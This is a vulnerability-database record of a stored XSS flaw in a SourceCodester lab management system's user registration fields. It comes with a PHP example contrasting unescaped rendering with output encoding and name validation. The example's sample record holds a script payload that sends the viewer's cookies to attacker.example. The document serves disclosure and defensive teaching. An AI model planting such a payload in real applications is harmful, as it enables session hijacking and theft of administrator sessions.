| Field | Value |
|---|---|
| Title | SourceCodester Computer Laboratory Management System 1.0 stored XSS |
| Description | Computer Laboratory Management System 1.0 contains a stored cross-site scripting (XSS) vulnerability caused by missing validation and sanitization of user input. Specifically, the registration() method of the Users class (reached through Users.php?f=save) stores the user-supplied firstname, middlename, lastname and username values without filtering, and the application later renders those values in the user list without output encoding. An attacker who can submit a user record can therefore place a script payload in one of these fields; when an administrator views the user list, the browser parses the stored value as HTML and the injected JavaScript runs in the administrator's session. The resulting risks include data theft, session hijacking and application defacement. |
| Source | https://github.com/Sospiro014/zday1/blob/main/xss_1.md |
| User | SoSPiro (UID 67134) |
| Submitted | 2024-04-01 12:52 PM (2 years ago) |
| Moderation | 2024-04-01 07:42 PM (7 hours later) |
| Status | Accepted |
| VulDB entry | 258915 [SourceCodester Computer Laboratory Management System 1.0 Users.php?f=save middlename cross-site scripting] |
| Points | 20 |
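As an added illustration (not code from the project, the submitter, or the VulDB entry), the following PHP shows the rendering pattern that produces this class of stored XSS next to the output-encoded form that prevents it, plus an input-side check for name fields. The function names, the `$user` record and the payload are assumptions constructed for the example; the real application's templates and column names may differ.

```php
<?php
// Added example, not the project's own code. render_user_row_vulnerable,
// render_user_row_safe, h and is_plausible_name are assumed names.

// Constructed sample record: the kind of value an attacker could store
// through Users.php?f=save if the fields are saved without validation.
$user = [
    'firstname'  => 'John',
    'middlename' => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'lastname'   => 'Doe',
    'username'   => 'jdoe',
];

// Vulnerable pattern: stored values concatenated straight into HTML.
// The browser parses the middlename value as markup, so the script runs
// in the session of whoever views the user list (here, the administrator).
function render_user_row_vulnerable(array $u): string
{
    return '<tr><td>' . $u['firstname'] . ' ' . $u['middlename'] . ' ' . $u['lastname']
         . '</td><td>' . $u['username'] . '</td></tr>';
}

// Hardened pattern: encode at the output boundary. ENT_QUOTES covers
// <, >, &, " and ' so a value cannot break out of text content or an
// attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string, which would otherwise silently drop the field.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_user_row_safe(array $u): string
{
    return '<tr><td>' . h($u['firstname']) . ' ' . h($u['middlename']) . ' ' . h($u['lastname'])
         . '</td><td>' . h($u['username']) . '</td></tr>';
}

// Defence in depth for the save path: reject values that cannot be a
// person's name before they reach the database. Letters (any script),
// combining marks, apostrophes, hyphens and spaces, 1..60 characters.
function is_plausible_name(string $s): bool
{
    return preg_match("/^[\p{L}\p{M}' \-]{1,60}$/u", $s) === 1;
}

echo render_user_row_vulnerable($user), PHP_EOL;   // script tag reaches the browser intact
echo render_user_row_safe($user), PHP_EOL;         // rendered as literal &lt;script&gt; text
var_dump(is_plausible_name($user['middlename'])); // bool(false): would be rejected on save
```

Output encoding is the control that actually closes the bug, because the same stored value may be rendered in several places; the name check only reduces what gets stored and should not be relied on alone, since fields such as addresses or notes legitimately contain characters it rejects.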